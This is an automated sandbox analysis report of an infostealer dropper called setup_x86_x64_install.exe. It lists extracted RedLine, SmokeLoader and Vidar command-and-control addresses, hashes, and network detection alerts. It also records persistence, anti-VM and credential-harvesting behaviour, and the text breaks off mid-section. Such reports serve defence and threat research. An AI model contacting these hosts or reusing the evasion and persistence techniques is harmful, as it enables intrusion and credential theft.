Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
3383s -
max time network
27792s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
01-11-2021 07:13
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
OneDriveSetup.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" OneDriveSetup.exe -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3252 3884 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5936 3884 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral5/memory/4972-315-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral5/memory/4972-316-0x0000000000418D3E-mapping.dmp family_redline -
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03d477f1a31.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS8A101816\Sun03d477f1a31.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5840 created 1984 5840 WerFault.exe Sun033e271e0ce96c08.exe PID 612 created 2332 612 WerFault.exe setup.exe -
suricata: ET MALWARE ClipBanker Variant Activity (POST)
suricata: ET MALWARE ClipBanker Variant Activity (POST)
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
suricata: ET MALWARE FormBook CnC Checkin (POST) M2
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral5/memory/1836-419-0x0000000004810000-0x00000000048E6000-memory.dmp family_vidar behavioral5/memory/1836-450-0x0000000000400000-0x0000000002BB8000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS8A101816\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8A101816\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8A101816\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A101816\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS8A101816\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS8A101816\libstdc++-6.dll aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
wlanext.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\_Z5DJXAXI = "C:\\Program Files (x86)\\Hsnulor\\updateppq.exe" wlanext.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run wlanext.exe -
Blocklisted process makes network request 26 IoCs
Processes:
cmd.exemshta.exeflow pid process 78 1384 cmd.exe 79 1384 cmd.exe 81 1384 cmd.exe 82 1384 cmd.exe 87 1384 cmd.exe 89 1384 cmd.exe 103 1384 cmd.exe 108 1384 cmd.exe 109 1384 cmd.exe 118 1384 cmd.exe 126 1384 cmd.exe 161 1384 cmd.exe 164 1384 cmd.exe 170 1384 cmd.exe 172 1384 cmd.exe 180 1384 cmd.exe 182 1384 cmd.exe 189 1384 cmd.exe 191 1384 cmd.exe 192 1384 cmd.exe 318 1384 cmd.exe 319 6480 mshta.exe 328 1384 cmd.exe 367 1384 cmd.exe 368 1384 cmd.exe 370 1384 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSun0324aba28588c0.exeSun03ea09aa5c9686e5.exeSun03f0dc4460bc9.exeSun03e4aeb7e43a1c.exeSun038aa349e3318e.exeSun033e271e0ce96c08.exeSun039750b00c.exeSun038db98f99bf9a.exeSun03d477f1a31.execmd.exeSun0351a0558292.exeSun0328255c4bce6fb.exeSun03f5d51697d04.exeSun03f5d51697d04.tmpSun0397381f1f458e.exeSun03f5d51697d04.exeSun03f5d51697d04.tmpLzmwAqmV.exeChrome5.exeDownFlSetup110.exeinst1.exeSoft1WW01.exe4.exe5.exesearch_hyperfs_206.exeSun03f0dc4460bc9.exesetup.exepostback.exechenxiulan-game.exeCalculator Installation.exe6.exe3069764135.exeLzmwAqmV.exe8767932.exe1444996.exekPBhgOaGQk.exe4787631693.exe5906233.exe7573297.exe5505137.exe681845.exeWinHoster.exeCalculator.exesetup.exeyTy3pjskcaOH3SGW7DDHaAqG.exeCalculator.exed3AMh7RrYP1XgER3nYdWgVrD.exezYHzp_ecSfHCBQQQXejKOBf6.exe1ElQX1vnC6hzc6ozl4KylRRW.exexcLVIwmxi_ZLJsepaVLcueHv.exeUzYxXqOkTtDpwSezwVXY7Exr.exeUjJmg_DELP1NaVeOyjr4XbfL.exelIJoDlCIBCCNb2IhrB3rTnjY.exeqk9UWVrVqY4tBN2oy63GGKMe.exeCMCX11vCmko9R4RXJMdgUVL4.exejw1BtrPSHkN5Ycj5GrGZrWNp.exeuecNmHuKV5CntDpX5R5cAnad.exeZDAes857uiA7Ldl_tt0f6Zy7.exeEN8kVF9nOEITndkmKROPnWJy.exePtIpbjLSQP_eHgf86mvDiq5x.exeCalculator.exedYLG3PpYw0yLWxJQRvws6jif.exepid process 424 setup_installer.exe 420 setup_install.exe 4116 Sun0324aba28588c0.exe 4252 Sun03ea09aa5c9686e5.exe 4204 Sun03f0dc4460bc9.exe 1384 Sun03e4aeb7e43a1c.exe 3468 Sun038aa349e3318e.exe 1984 Sun033e271e0ce96c08.exe 4416 Sun039750b00c.exe 2004 Sun038db98f99bf9a.exe 1180 Sun03d477f1a31.exe 4104 cmd.exe 3904 Sun0351a0558292.exe 5044 Sun0328255c4bce6fb.exe 316 Sun03f5d51697d04.exe 3288 Sun03f5d51697d04.tmp 1264 Sun0397381f1f458e.exe 1332 Sun03f5d51697d04.exe 3176 Sun03f5d51697d04.tmp 1744 LzmwAqmV.exe 3500 Chrome5.exe 3128 DownFlSetup110.exe 1152 inst1.exe 1836 Soft1WW01.exe 2564 4.exe 3968 5.exe 3592 search_hyperfs_206.exe 4972 Sun03f0dc4460bc9.exe 2332 setup.exe 2176 postback.exe 2472 chenxiulan-game.exe 64 Calculator Installation.exe 68 6.exe 1448 3069764135.exe 1008 LzmwAqmV.exe 3352 8767932.exe 2064 1444996.exe 1820 kPBhgOaGQk.exe 2432 4787631693.exe 5164 5906233.exe 5604 7573297.exe 5644 5505137.exe 5736 681845.exe 6076 WinHoster.exe 5356 Calculator.exe 5956 setup.exe 4872 yTy3pjskcaOH3SGW7DDHaAqG.exe 5576 Calculator.exe 5488 d3AMh7RrYP1XgER3nYdWgVrD.exe 2440 zYHzp_ecSfHCBQQQXejKOBf6.exe 5464 1ElQX1vnC6hzc6ozl4KylRRW.exe 3036 xcLVIwmxi_ZLJsepaVLcueHv.exe 2252 UzYxXqOkTtDpwSezwVXY7Exr.exe 760 UjJmg_DELP1NaVeOyjr4XbfL.exe 3044 lIJoDlCIBCCNb2IhrB3rTnjY.exe 2356 qk9UWVrVqY4tBN2oy63GGKMe.exe 2168 CMCX11vCmko9R4RXJMdgUVL4.exe 5264 jw1BtrPSHkN5Ycj5GrGZrWNp.exe 1364 uecNmHuKV5CntDpX5R5cAnad.exe 3708 ZDAes857uiA7Ldl_tt0f6Zy7.exe 1788 EN8kVF9nOEITndkmKROPnWJy.exe 5704 PtIpbjLSQP_eHgf86mvDiq5x.exe 4636 Calculator.exe 6012 dYLG3PpYw0yLWxJQRvws6jif.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1444996.exeuecNmHuKV5CntDpX5R5cAnad.exeCMCX11vCmko9R4RXJMdgUVL4.exeBnaQE7vssOIGKiIFtluJLNOT.exeCMCX11vCmko9R4RXJMdgUVL4.exeBnaQE7vssOIGKiIFtluJLNOT.exetory.exeZDAes857uiA7Ldl_tt0f6Zy7.exeEN8kVF9nOEITndkmKROPnWJy.exedYLG3PpYw0yLWxJQRvws6jif.exe5906233.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1444996.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uecNmHuKV5CntDpX5R5cAnad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CMCX11vCmko9R4RXJMdgUVL4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BnaQE7vssOIGKiIFtluJLNOT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CMCX11vCmko9R4RXJMdgUVL4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BnaQE7vssOIGKiIFtluJLNOT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BnaQE7vssOIGKiIFtluJLNOT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1444996.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tory.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ZDAes857uiA7Ldl_tt0f6Zy7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EN8kVF9nOEITndkmKROPnWJy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dYLG3PpYw0yLWxJQRvws6jif.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dYLG3PpYw0yLWxJQRvws6jif.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ZDAes857uiA7Ldl_tt0f6Zy7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BnaQE7vssOIGKiIFtluJLNOT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CMCX11vCmko9R4RXJMdgUVL4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tory.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5906233.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uecNmHuKV5CntDpX5R5cAnad.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EN8kVF9nOEITndkmKROPnWJy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CMCX11vCmko9R4RXJMdgUVL4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5906233.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Sun038db98f99bf9a.exeSun038aa349e3318e.exeCalculator.exeCalculator.exeCalculator.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Sun038db98f99bf9a.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Sun038aa349e3318e.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Calculator.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSun03f5d51697d04.tmpSun03f5d51697d04.tmpCalculator Installation.exerundll32.exeBnaQE7vssOIGKiIFtluJLNOT.exemsiexec.exerundll32.exesetup.exeCalculator.exeCalculator.exeCalculator.exehschgIT73zIyo43yY5y_5zDy.exeCalculator.exeCalculator.exeCalculator.exeCalculator.exeAcE5WunU9rbhvxIHGczo1xiA.exeCalculator.exexcLVIwmxi_ZLJsepaVLcueHv.exepid process 420 setup_install.exe 420 setup_install.exe 420 setup_install.exe 420 setup_install.exe 420 setup_install.exe 420 setup_install.exe 420 setup_install.exe 3288 Sun03f5d51697d04.tmp 3176 Sun03f5d51697d04.tmp 64 Calculator Installation.exe 64 Calculator Installation.exe 2844 rundll32.exe 4628 BnaQE7vssOIGKiIFtluJLNOT.exe 64 Calculator Installation.exe 64 Calculator Installation.exe 64 Calculator Installation.exe 1796 msiexec.exe 1796 msiexec.exe 4100 rundll32.exe 4100 rundll32.exe 5956 setup.exe 5956 setup.exe 5956 setup.exe 5956 setup.exe 5956 setup.exe 5576 Calculator.exe 5576 Calculator.exe 5576 Calculator.exe 4636 Calculator.exe 4080 Calculator.exe 5720 hschgIT73zIyo43yY5y_5zDy.exe 4080 Calculator.exe 4080 Calculator.exe 5720 hschgIT73zIyo43yY5y_5zDy.exe 5720 hschgIT73zIyo43yY5y_5zDy.exe 5912 Calculator.exe 5912 Calculator.exe 5912 Calculator.exe 5912 Calculator.exe 2572 Calculator.exe 2572 Calculator.exe 2572 Calculator.exe 6128 Calculator.exe 6128 Calculator.exe 6128 Calculator.exe 6128 Calculator.exe 5720 hschgIT73zIyo43yY5y_5zDy.exe 5956 setup.exe 64 Calculator Installation.exe 6936 Calculator.exe 6936 Calculator.exe 6936 Calculator.exe 6936 Calculator.exe 7052 AcE5WunU9rbhvxIHGczo1xiA.exe 7052 AcE5WunU9rbhvxIHGczo1xiA.exe 2148 Calculator.exe 2148 Calculator.exe 2148 Calculator.exe 3036 xcLVIwmxi_ZLJsepaVLcueHv.exe 3036 xcLVIwmxi_ZLJsepaVLcueHv.exe 7052 AcE5WunU9rbhvxIHGczo1xiA.exe 7052 AcE5WunU9rbhvxIHGczo1xiA.exe 7052 AcE5WunU9rbhvxIHGczo1xiA.exe 7052 AcE5WunU9rbhvxIHGczo1xiA.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
OneDriveSetup.exe5505137.exesetup.exesetup.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 5505137.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --ZgwMku75" setup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" OneDriveSetup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
kPBhgOaGQk.exeCalculator.exe1ElQX1vnC6hzc6ozl4KylRRW.exelIJoDlCIBCCNb2IhrB3rTnjY.exetory.exepostback.exeCalculator.exeSun03f5d51697d04.tmpsearch_hyperfs_206.exeLzmwAqmV.exeCMCX11vCmko9R4RXJMdgUVL4.exemshta.exe5906233.exemshta.exeBnaQE7vssOIGKiIFtluJLNOT.exe7573297.exemshta.exemshta.exeBnaQE7vssOIGKiIFtluJLNOT.exe1444996.exeuecNmHuKV5CntDpX5R5cAnad.exemshta.exemshta.exejg1_1faf.exeCalculator.exeEN8kVF9nOEITndkmKROPnWJy.exedYLG3PpYw0yLWxJQRvws6jif.exeZDAes857uiA7Ldl_tt0f6Zy7.exemshta.exeSun039750b00c.exemshta.exeCMCX11vCmko9R4RXJMdgUVL4.exeCalculator.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1ElQX1vnC6hzc6ozl4KylRRW.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lIJoDlCIBCCNb2IhrB3rTnjY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tory.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA postback.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Sun03f5d51697d04.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA search_hyperfs_206.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LzmwAqmV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CMCX11vCmko9R4RXJMdgUVL4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5906233.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BnaQE7vssOIGKiIFtluJLNOT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7573297.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BnaQE7vssOIGKiIFtluJLNOT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1444996.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uecNmHuKV5CntDpX5R5cAnad.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EN8kVF9nOEITndkmKROPnWJy.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dYLG3PpYw0yLWxJQRvws6jif.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ZDAes857uiA7Ldl_tt0f6Zy7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Sun039750b00c.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CMCX11vCmko9R4RXJMdgUVL4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Calculator.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 497 ipinfo.io 498 ipinfo.io 82 freegeoip.app 103 freegeoip.app 149 ipinfo.io 150 ipinfo.io 151 ipinfo.io 436 ipinfo.io 437 ipinfo.io 27 ip-api.com 80 freegeoip.app 87 freegeoip.app -
Drops file in System32 directory 13 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{D150A421-63CD-46E4-ADDB-794A26A5C800} svchost.exe File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-941723256-3451054534-3089625102-1000 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 95A137F76759A7BF svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
Processes:
1444996.exe5906233.exeCMCX11vCmko9R4RXJMdgUVL4.exedYLG3PpYw0yLWxJQRvws6jif.exeZDAes857uiA7Ldl_tt0f6Zy7.exeBnaQE7vssOIGKiIFtluJLNOT.exeCMCX11vCmko9R4RXJMdgUVL4.exeBnaQE7vssOIGKiIFtluJLNOT.exepid process 2064 1444996.exe 5164 5906233.exe 2168 CMCX11vCmko9R4RXJMdgUVL4.exe 6012 dYLG3PpYw0yLWxJQRvws6jif.exe 3708 ZDAes857uiA7Ldl_tt0f6Zy7.exe 4628 BnaQE7vssOIGKiIFtluJLNOT.exe 6472 CMCX11vCmko9R4RXJMdgUVL4.exe 6636 BnaQE7vssOIGKiIFtluJLNOT.exe -
Suspicious use of SetThreadContext 12 IoCs
Processes:
